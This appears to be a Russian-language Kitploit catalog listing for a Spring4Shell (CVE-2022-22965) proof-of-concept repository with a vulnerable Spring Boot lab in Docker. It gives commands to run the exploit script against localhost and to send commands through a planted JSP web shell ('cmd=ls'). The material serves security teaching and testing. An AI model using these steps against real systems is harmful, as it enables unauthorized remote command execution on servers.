Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-22965 — Эксплойт для проверки концепции (Proof-of-Concept) для CVE-2022-22965 (Spring4Shell) с уязвимым приложением Spring Boot, скриптом эксплойта на Python и лабораторной средой на основе Docker для тестирования. | Kitploit
Инструменты/GitHubGitHub/mariomamo/cve-2022-22965
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubmariomamo/cve-2022-22965

CVE-2022-22965

Эксплойт для проверки концепции (Proof-of-Concept) для CVE-2022-22965 (Spring4Shell) с уязвимым приложением Spring Boot, скриптом эксплойта на Python и лабораторной средой на основе Docker для тестирования.

Репозиторий
5114 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

👾 CVE-2022-22965

Это доказательство концепции эксплойта для уязвимости CVE-2022-22965 (spring4shell). Он состоит из:

  • Уязвимое приложение на Springboot;
  • Скрипт эксплойта, написанный на Python;
  • Безопасное приложение для проверки, что эксплойт не работает;
  • Dockerfile для запуска уязвимого приложения и тестирования эксплойта;

🔧Соавторы

  • [🇮🇹] Mario Offertucci;
  • [🇮🇹] Antonio Donnarumma.

⚙️ Предварительные требования

  • Docker: Используется для запуска контейнера Tomcat с приложением на Springboot;
  • Python: Используется для запуска эксплойта;

1️⃣ Запуск приложения Springboot

В корневой папке проекта находится Dockerfile, который создаёт образ Tomcat и копирует файлы vulnerable_app/target/spring4shell.war и safe_app/target/safeapp.war в папку /usr/local/tomcat/webapps, так что вам нужно только собрать образ и запустить контейнер.

Сборка образа Tomcat

root@kitploit:~
docker build -t cve_2022_22965 .

Запуск контейнера

root@kitploit:~
docker run -p 8080:8080 -d --name springshell cve_2022_22965

Проверка, отвечает ли приложение

root@kitploit:~
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson

Если вы увидите такой ответ

root@kitploit:~
This is Elliot Alderson

Значит, приложение запущено и работает.

2️⃣ Теперь вы можете запустить эксплойт

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit

Вы можете опционально указать имя внедряемого jsp-файла, но это необязательно. Пример

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp

Если вы не укажете имя, будет сгенерировано случайное.

В командной оболочке вы увидите следующее
После эксплойта вы также можете отправить команду через HTTP GET-запрос

root@kitploit:~
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls

Вы успешно открыли оболочку на целевой машине! наслаждайтесь

Скачать инструмент